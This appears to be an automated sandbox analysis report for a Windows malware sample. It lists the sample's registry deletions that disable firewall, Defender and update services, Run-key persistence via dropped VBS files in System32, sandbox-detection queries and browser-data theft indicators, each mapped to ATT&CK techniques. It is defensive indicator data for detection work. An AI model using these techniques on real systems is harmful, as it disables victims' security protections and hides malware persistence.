166c3c2fbe8392fb4b4ddaf5f192d94cc321c5fc4d65bd698a4d691416e999c6

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts	reg.exe

Modifies security service 2 TTPs 18 IoCs

evasion

Modify Registry

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\MpsSvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Security	reg.exe

Modifies system executable filetype association 2 TTPs 45 IoCs

persistence

Modify Registry

Change Default File Association

T1042

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\OpenContainingFolderMenu	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\{8895b1c6-b41f-4c1c-a562-0d564250836f}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\DropHandler	reg.exe

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Registers new Print Monitor 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

reg.exereg.exereg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Lenovo (-5934) = "C:\\Users\\Public\\LENOVO.DAT.vbs"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Lenovo (-11551) = "C:\\Windows\\System32\\icmp.vbs"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI	reg.exe

Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

Maps connected drives based on registry 3 TTPs 3 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	reg.exe

Drops file in System32 directory 2 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\System32\icmp.bat cmd.exe
File opened for modification C:\Windows\System32\icmp.vbs cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\System32\icmp.bat	cmd.exe
File opened for modification	C:\Windows\System32\icmp.vbs	cmd.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

reg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

612 timeout.exe

pid	process
612	timeout.exe

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

System Information Discovery

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{4E7BD74F-2B8D-469E-99FF-FD60BB9AAE2D}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{011B3619-FE63-4814-8A84-15A194CE9CE3}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\SearchSuggestions\History	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{991DA7E5-953F-435B-BE5E-B92A05EDFC42}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Transitions	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA7C375B-66A7-4280-879D-FD459C84BB02}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\Extension	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{8936033C-4A50-11D1-98A4-00A0C90F27C6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{01002B17-5D93-4551-81E4-831FEF780A53}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{1DF67C43-AEAA-11CF-BA92-444553540000}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{860bb310-5d01-11d0-bd3b-00a0c911ce86}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{A2E3074E-6C3D-11D3-B653-00C04F79498E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0006f02a-0000-0000-c000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{62EC9F22-5E30-11D2-97A1-00C04FB6DD9A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C46C1BE6-3C52-11D0-9200-848C1D000000}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{43D9E6F0-1776-4897-AE14-ECEDECBAFEC0}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DPA	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\UnattendBackup\SuggestedSitesEnabled	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{108092BF-B7DB-40D1-B7FB-F55922FCC9BE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\UnattendBackup\ShowInformationBar	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9590092D-8811-11CF-8075-444553540000}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FC28B75F-F9F6-4C92-AF91-14A3A51C49FB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{C46C1BC4-3C52-11D0-9200-848C1D000000}	reg.exe
